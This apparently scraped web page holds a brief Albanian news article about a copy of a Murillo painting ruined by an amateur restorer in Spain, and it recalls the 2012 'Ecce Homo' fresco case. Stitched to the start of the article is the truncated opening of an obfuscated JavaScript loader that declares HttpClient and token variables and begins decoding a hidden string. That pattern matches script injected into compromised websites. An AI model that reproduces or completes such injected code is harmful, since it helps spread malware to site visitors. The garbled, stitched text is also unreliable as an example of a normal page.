;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Edhe një pikturë deformohet nga tentimi për ta restauruar

By

Një kopje e pikturës nga artisti i barokut, Bartolome Esteban Murillo, është deformuar nga restaurimi që i është bërë.

Koleksionusi i veprave të artit kishte paguar 1 mijë e 200 euro që ajo të pastrohej nga një restaurues orendish, sipas Europa Press.

Sidoqoftë, pavarësisht dy tentimeve për ta rregulluar, piktura “Ngjizja e patëmetë” ka mbetur më shumë me të meta se me vlera.

Ky incident ka rikthyer vëmendjen e një tjetër shkatërrimi pikture në tentim restaurimi që kishte ndodhur më 2012.

Një e moshuar kishte provuar që ta rregullojë një freskë të çmueshme të Jezu Krishtit në një kishë lokale afër Zaragozës. Mirëpo puna e saj e tmerrshme kishte bërë që piktura të quhej nga disa si “Krishti Majmun”.

Në Spanjë nuk ka ndonjë ligj që ndalon njerëzit që t’i restaurojnë veprat artistike edhe nëse ata nuk i kanë shkathtësitë e nevojshme.

Artikuj të ngjashëm